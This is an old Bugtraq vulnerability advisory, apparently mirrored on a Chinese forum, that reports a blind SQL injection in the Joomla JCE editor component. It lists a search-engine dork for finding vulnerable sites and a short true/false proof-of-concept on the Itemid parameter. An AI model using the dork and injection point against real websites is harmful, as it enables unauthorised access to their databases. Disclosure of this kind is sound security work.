joomlacontenteditor (com_jce) BLIND sql injection vulnerability

看板Bugtraq作者eidelweiss.時間15年前 (2011/04/09 03:32)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

=================================================================== joomlacontenteditor (com_jce) BLIND sql injection vulnerability =================================================================== Software: joomlacontenteditor (com_jce) Vendor: www.joomlacontenteditor.net Vuln Type: BLind SQL Injection Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here) Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info Dork: inurl:"/index.php?option=com_jce" References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html =================================================================== Description: JCE makes creating and editing Joomla!긠 content easy Add a set of tools to your Joomla!긠environment that give you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... =================================================================== exploit & p0c [!] index.php?option=com_jce&Itemid=[valid Itemid] Example p0c [!] http://host/index.php?option=com_jce&Itemid=8 <= True [!] http://host/index.php?option=com_jce&Itemid=-8 <= False ==================================================================== Nothing Impossible In This World Even Nobody`s Perfect ===================================================================

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 eidelweiss. 的文章

文章代碼(AID): #1DdsApsA (Bugtraq)